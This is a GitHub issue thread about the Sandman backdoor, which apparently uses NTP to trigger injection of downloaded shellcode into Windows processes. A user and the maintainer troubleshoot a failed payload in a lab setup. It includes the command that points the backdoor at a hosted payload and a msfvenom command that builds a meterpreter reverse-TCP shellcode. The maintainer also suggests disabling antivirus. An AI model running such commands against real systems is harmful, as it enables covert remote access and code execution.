Why is not working? [Usage issue]

[iz4tow]

Hello, I tried to compile the backdoor with VS 2022 (of course changing the ntpServer string) and started the using this command: ~# ./sandman_server.py vmnet1 http://192.168.106.1/rs_exploitl.exe

---

/ __| | |
| ( | | _
_ \ / ` | ' \ / ` | ' _ \ / _ | ' \ ____) | (| | | | | (| | | | | | | (| | | | | |/ \,|| ||\,|| || ||_,|| ||

[ + ] Got a packet from the backdoor! [ ! ] Entering sandman... [ + ] Activated the backdoor for 192.168.106.128!

192.168.106.128 is obviously the Windows host On 192.168.106.1 there is a simpleHttp (python -m SimpleHTTPServer 80) server that expose rs_exploitl.exe, a simple metasploit TCP reverse shell

But nothing happen. I also used Wireshark on Windows host to monitor the traffic, but I can see only the NTP traffic and nothing else.

Injector.InjectShellcode(payloadUrl, payloadSize, "RuntimeBroker") returns true...so I can't understand

Thanks in advance

[Idov31]

Hey, When injecting to RuntimeBroker you need to run with administrative privileges, if you change the target to something else or run this as an administrator it works?

[iz4tow]

I tried to run as administrator and I also tried to ingject to Notepad (notepad of course was running) but nothing changed. And however if the injection fail I think that Injector.InjectShellcode(payloadUrl, payloadSize, "RuntimeBroker") will return false

[Idov31]

Can you provide the windows version and build? And I pushed yesterday a bug fix, you are using the latest version?

[iz4tow]

Is the last commit I think, here the hash aebe07410d558527c2cb8d12b663419ca7b3dd82 Sandman Server on Ubuntu 20.04 Sandman "client" on Windows 11 Pro N 21H2 build 22000.318 and Windows 10 Edu build 19044.1766

[Idov31]

I'm trying to recreate the issue, when you compiled the SandmanBackdoor (client) - you used x64 or the default Any CPU option?

[iz4tow]

I tried with any cpu

On Sat, Aug 27, 2022, 18:45 Ido Veltzman @.***> wrote:

I'm trying to recreate the issue, when you compiled the SandmanBackdoor (client) - you used x64 or the default Any CPU option?

— Reply to this email directly, view it on GitHub https://github.com/Idov31/Sandman/issues/2#issuecomment-1229225236, or unsubscribe https://github.com/notifications/unsubscribe-auth/AIBDKJMG2NWU7YUZCJGWYC3V3JAZFANCNFSM57QZIYYQ . You are receiving this because you authored the thread.Message ID: @.***>

[Idov31]

Try with x64 and let me know if it worked, I'll add this to the compiling instructions :)

[iz4tow]

You are right with x64 it does the download

Serving HTTP on 0.0.0.0 port 80 ... 192.168.106.128 - - [27/Aug/2022 19:40:02] "GET /rs_exploitl.exe HTTP/1.1" 200 -

but it does not launch rs_exploitl.exe. Of course if I manually download the .exe file and if I launch it, it works, so the problem is not on metasploit rev_shell.

To try Sandman I followed this simple guide to make a simple rev_tcp backdoor with metasploit reverse_shell

[Idov31]

Now I understand the problem, you wrote this before and I didn't notice but Sandman is meant for shellcodes and not for standalone programs, it might be changed in the future.

I'll bold the part that it can only run shellcodes for now in the README to avoid confusions.

[iz4tow]

Oh sorry you are right. With shellcode it's working, but only with x64 CPU option.

On Sat, Aug 27, 2022, 19:55 Ido Veltzman @.***> wrote:

Now I understand the problem, maybe you wrote this before and I didn't notice but Sandman is meant for shellcodes and not for standalone programs, it might be changed in the future.

I'll bold the part that it can only run shellcodes for now in the README to avoid confusions.

— Reply to this email directly, view it on GitHub https://github.com/Idov31/Sandman/issues/2#issuecomment-1229236439, or unsubscribe https://github.com/notifications/unsubscribe-auth/AIBDKJPMYRUICGPJL5HAWOTV3JI7ZANCNFSM57QZIYYQ . You are receiving this because you authored the thread.Message ID: @.***>

[Idov31]

Currently, it won't work with a x86 shellcode since it is relied on an injected x64 shellcode. (https://github.com/Idov31/Sandman/blob/master/SandmanBackdoor/Sandman/Injector.cs#L10) If you don't mind, I'll pin this issue so it will be helpful for others as well and clarify the README.

[iz4tow]

Hi. I tried with x64 building parameter on VS2022 and the software is doing the download, but I can't run my shellcode. To generate the shellcode I used this msf command: msfvenom -p windows/x64/meterpreter/reverse_tcp 192.168.106.1 LPORT=4444 -f raw > exploit

The webserver: python -m SimpleHTTPServer 80 (working and downloading

Sandman Server: python3 sandman_server.py vmnet1 http://192.168.106.1/exploit

The client download the shellcode but it does nothing more. I think I'm doing something wrong, can you help me?

Thanks

What am I doing wrong?

Thanks

[Idov31]

Hey, please try the following actions and tell me if that worked:

1. Since metasploit's reverse shell is heavily detected try to disable the AV if you want to test it with an unobfuscated version of it.
2. Make sure you changed the payload size variable in the server properties.

If it is still doesn't work you can contact me in twitter: @Idov31 and I'll debug with you the problem (I can't recreate the problem).

[iz4tow]

I let a message to your post on twitter. However I have a 510 bytes shellcode and I set 0x1fe as PAYLOAD_SIZE in sandman_server.py but it still not working, Sandman client does the download (I can see it from simpleHTTPServer console). The problem is not the AV software because I tried to use a meterpreter exacutable and it worked.

[Idov31]

Since the source of this issue is in the injected shellcode (taken from D-R-Shellcode) I'm closing this issue. When the issue will be fixed I'll update Sandman.